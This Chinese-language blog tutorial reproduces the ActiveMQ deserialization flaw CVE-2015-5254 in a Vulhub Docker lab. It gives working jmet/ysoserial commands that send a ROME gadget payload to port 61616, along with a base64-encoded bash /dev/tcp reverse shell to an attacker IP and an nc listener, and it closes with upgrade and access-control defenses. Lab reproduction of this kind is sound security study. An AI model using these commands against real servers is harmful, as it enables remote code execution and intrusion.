ActiveMQ 反序列化漏洞CVE-2015-5254复现

ActiveMQ反序列化漏洞（CVE-2015-5254）是一个严重的安全漏洞，以下是对该漏洞的产生原因、利用条件和过程以及PoC（Proof of Concept，概念验证）的详细分析：

[漏洞环境搭建]:Vulhub - Docker-Compose file for vulnerability environment
[搭建Vulhub和jdk和docker环境参考]:(https://blog.csdn.net/m0_59839948/article/details/141931317)

一、产生原因

Apache ActiveMQ是由美国Apache软件基金会开发的开源消息传递中间件，它支持Java消息传递服务、集群、Spring框架等。

CVE-2015-5254漏洞的产生原因是Apache ActiveMQ在5.13.0之前的5.x版本中，程序没有限制可在代理中序列化的类。这意味着远程攻击者可以构造特制的序列化的Java消息服务（JMS）ObjectMessage对象，并通过该漏洞在目标系统上执行任意代码。

首先是 org.apache.activemq.util.JMSExceptionSupport.createSerializableException() 方法中的缺陷，该方法将 JMSException 异常对象序列化为字节数组，这个字节数组包含了 cause 内的异常和 message 内的信息。攻击者可以构造精心设计的 cause 和 message 来注入恶意代码。接着，ActiveMQ 的 BlobMessage 与 ActiveMQMessage 消息类型中，也存在缺陷，它们并没有充分校验所接收消息的类型和信息，而是直接调用了 JMSExceptionSupport.createSerializableException() 方法将 JMSException 对象序列化为字节数组，从而使得攻击者可以执行任意代码。

二、利用条件

要利用CVE-2015-5254漏洞，攻击者需要满足以下条件：

1. 目标系统需要运行Apache ActiveMQ 5.13.0之前的5.x版本。
2. 攻击者需要能够向目标ActiveMQ服务器发送JMS消息。
3. 攻击者需要构造并发送包含恶意序列化数据的JMS ObjectMessage。

三、利用过程

CVE-2015-5254漏洞的利用过程大致如下：

1. 构造恶意消息：攻击者首先使用工具（如ysoserial）构造一个包含恶意代码的序列化JMS ObjectMessage。这个恶意代码可以是任何能够在目标系统上执行的命令。
2. 发送恶意消息：攻击者将构造好的恶意消息发送到目标ActiveMQ服务器的61616端口（这是ActiveMQ的默认工作端口，用于消息传递）。
3. 触发漏洞：当ActiveMQ服务器接收到这个恶意消息并尝试对其进行反序列化时，会触发漏洞，导致恶意代码在目标系统上执行。
4. 执行任意代码：一旦恶意代码被执行，攻击者就可以在目标系统上执行任意操作，如窃取敏感数据、部署恶意软件或发起其他攻击。

四、PoC（概念验证）

以下是一个简单的PoC示例，展示了如何利用CVE-2015-5254漏洞在目标系统上执行任意命令：

1. 下载并配置jmet工具：首先，攻击者需要下载jmet工具（一个用于利用ActiveMQ反序列化漏洞的工具）。然后，在同目录下创建一个external文件夹（这是jmet工具的要求,否则可能会出现文件夹不存在的错误)）。

2. 构造并发送恶意消息：jmet–》jmet-0.1.0-all下载，jmet是使用ysoserial来生成Payload并发送的(jar自带ysoserial，我们不需要再下载)，所以我们需要选择一个可以在ysoserial中使用的小工具，比如ROME。 使用jmet工具构造一个包含恶意命令的序列化JMS ObjectMessage，并将其发送到目标ActiveMQ服务器的61616端口。例如，可以使用以下命令来构造并发送一个包含“touch /tmp/success”命令的恶意消息：

   java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME target_ip 61616
   

   其中，-Q指定队列消息名，-I选择要装载的JMS客户端（这里是ActiveMQ），-s是选择ysoserial payload，-Y指定具体的命令，-Yp指定payload类型（这里是ROME），target_ip是目标ActiveMQ服务器的IP地址，61616是目标ActiveMQ服务器的工作端口。

3. 验证漏洞利用是否成功：攻击者可以通过访问目标系统的/tmp目录来检查是否成功创建了名为“success”的文件。如果文件存在，则说明漏洞利用成功。

五、poc环境验证

使用find搜索vulhub已安装目录

find . -type d -name "vulhub"  
-- . 表示当前目录，-type d 表示搜索类型为目录sudo find / -type d -name "vulhub" 2>/dev/null-- 2>/dev/null 是为了将错误消息（例如权限不足的目录）重定向到空设备，以避免干扰搜索结果。

打开activeMQ组件

/home/kali/vulhub/activemq/CVE-2015-5254

查看配置文件端口

启动镜像-文件配置好后

sudo docker-compose up -d   # -d是后台运行

对于Docker 镜像下载问题及解决办法

参考：https://blog.csdn.net/weixin_53742691/article/details/143176183
在 /etc/docker/daemon.json 文件中添加以下内容，以设置镜像加速器：

  {"registry-mirrors" : ["https://jkfdsf2u.mirror.aliyuncs.com","https://registry.docker-cn.com"],"insecure-registries" : ["docker-registry.zjq.com"],"log-driver": "json-file","log-opts": {"max-size": "10m","max-file": "10"},"data-root": "/data/docker"} 

设置好镜像源地址，进行重启docker

1. cd /etc/docker/2. 创建一个docker 的配置文件：daemon.json（要是存在就不需要创建了）
touch daemon.json3. 给予权限; chmod 777 daemon.json4.编辑 daemon.json，添加阿里云源vi daemon.json
输入时按i健，然后进行替换，完成之后按Esc健进行退出，再按:wq!进行保存退出
{"registry-mirrors": ["https://alzgoonw.mirror.aliyuncs.com"]}清理docker缓存
sudo docker system prune5.完成以上步骤，接下来重新加载文件和重启docker
systemctl daemon-reload
systemctl restart docker

查看docker容器状态

sudo  docker ps -a  # 查看docker的启动服务
sudo docker stop 128e    #128e是docker容器id的缩写

5.1 docker拉取资源

sudo  docker ps -a  # 查看docker的启动服务

5.2 访问漏洞环境

用本地机访问kali中docker容器中MQ,已成功部署

可以看到主页，然后点击Manage ActiveMQ broker 进入到登录界面，用户名和密码都是admin

登录成功，Queues的消息队列是空的

5.3 进行攻击靶场

构建攻击payload：
首先下载jmet的jar文件，并在同目录下创建一个external文件夹（否则可能会爆文件夹不存在的错误）。jmet原理是使用ysoserial生成Payload并发送（其jar内自带ysoserial，无需再自己下载），所以我们需要在ysoserial是gadget中选择一个可以使用的，比如ROME。

cd /opt
mkdir external
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

到kali里边直接使用jmet-0.1.0-all.jar 创建目录进行验证命令：

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y "touch /tmp/weig_test" -Yp ROME 192.168.225.166 61616 

看到队列里出现了一个event新的任务

点进event，点进去任务详情触发

进入docker检验漏洞是否存在,看看/tmp下面是否有我们写入的文件先查看docker的进程：

docker ps -a 

进入容器：docker exec -it 128eab244067 /bin/bash ，进入到‘/tmp’目录可以看到weig_test文件存在，说明漏洞利用成功

docker exec -it 128eab244067  /bin/bash

5.4 反弹shell

可以看到文件被成功写入，确认漏洞之后就可以进行getshell，更换一下命令即可。

echo "bash -i >& /dev/tcp/192.168.225.166/5555 0>&1" >/tmp/shell.sh && bash /tmp/shell.sh   # ip是攻击机kali地址echo: 这个命令用于输出的字符串。
bash -i: 启动一个交互式的 Bash shell。
/dev/tcp/ 是一个伪设备，用于在 Bash 中实现 TCP 连接。
>& /dev/tcp/192.168.225.166/5555: 利用 Bash 的特殊功能，通过 TCP 连接到 IP 地址为 192.168.225.166，端口号为 5555 的服务器。
0>&1: 这是重定向的一部分，将标准输入（文件描述符 0）重定向到标准输出（文件描述符 1），确保 shell 会话中的交互能够正常工作。
>/tmp/shell.sh: 这将 echo 命令的输出重定向到 /tmp/shell.sh 文件中，而不是显示在终端上

编码base64

ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNTU1NSAwPiYxIiA+L3RtcC9zaGVsbC5zaCAmJiBiYXNoIC90bXAvc2hlbGwuc2g=

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNTU1NSAwPiYxIiA+L3RtcC9zaGVsbC5zaCAmJiBiYXNoIC90bXAvc2hlbGwuc2g=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.225.166 61616

进行点击

点击这个ID号

进入此页面，已触发

使用kali进行监听端口，当点击详情后成功反弹shell

nc -lvnp 5555

反弹shell成功，至此漏洞复现完成。

六、防御措施

为了防范CVE-2015-5254漏洞，建议采取以下防御措施：

1. 升级ActiveMQ版本：尽快将ActiveMQ升级到5.13.0或更高版本，以修复该漏洞。
2. 限制消息类型：在ActiveMQ的配置中限制可接受的消息类型，避免接受未知的或不受信任的消息类型。
3. 加强访问控制：配置防火墙规则以限制对ActiveMQ服务器的访问，确保只有受信任的用户或系统能够发送消息到ActiveMQ服务器。
4. 监控和日志记录：启用ActiveMQ的监控和日志记录功能，以便及时发现并响应可疑活动。

综上所述，CVE-2015-5254漏洞是一个严重的安全威胁，用户应尽快采取措施进行修复和防范。